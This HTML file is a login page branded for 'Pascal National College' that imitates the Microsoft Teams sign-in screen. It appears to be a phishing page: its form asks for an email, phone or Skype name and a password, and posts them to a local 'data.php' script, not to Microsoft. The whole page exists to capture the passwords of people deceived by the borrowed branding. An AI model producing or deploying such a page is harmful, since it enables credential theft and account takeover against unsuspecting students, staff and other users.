<!DOCTYPE html>
<html>
    <head>
        <title>Welcome to Pascal National College</title>

<style>
body {
    height: 100%;
    width: 100%;
            
    }
.head{
    
    width: 100%;
    background-color: rgb(134, 21, 51);
    color: white;
    display: block;
    text-align: center;
    padding-top: 50px;
    padding-bottom: 50px;
}
.pascal{
    font-size: 55px;
    font-weight: bold;
}
.college{
    font-size: 35px;
}

.microsoft{
    text-align: center;
    color: rgb(92, 95, 200);
    font-size: 45px;
}
.intro{
    text-align: center;
    font-size: 26px;
}
form{
    text-align: center;
}
form input{
    padding-left: 10px;
    height: 100px;
    width: 80%;
    font-size: 35px;
    border-radius: 8px;
}
.footer{
    text-align: center;
    font-size: 25px;
    color: rgb(92, 95, 200);
}

</style>

    </head>

<body>

    <div class="head">
        <div class="pascal">Pascal</div>
        <div class="college">National College</div>
    </div>

    <p class="microsoft">Microsoft Teams</p>

    <p class="intro">
        Get started with your work, school, or
        <br>
        personal Microsoft account
    </p>

    <br><br>

    <form action="data.php" method="post">
        <input type="email" placeholder="Enter email, phone or skype" name="email">
        <br><br>
        <input type="password" placeholder="Password" name="password">
        <br><br>
        <input type="submit" value="Sign in" style="text-align: center; background-color: rgb(92, 95, 200); color: white;">
    </form>

<br><br>
    <p class="footer">No account? <strong>Create one for free</strong></p>

</body>

</html>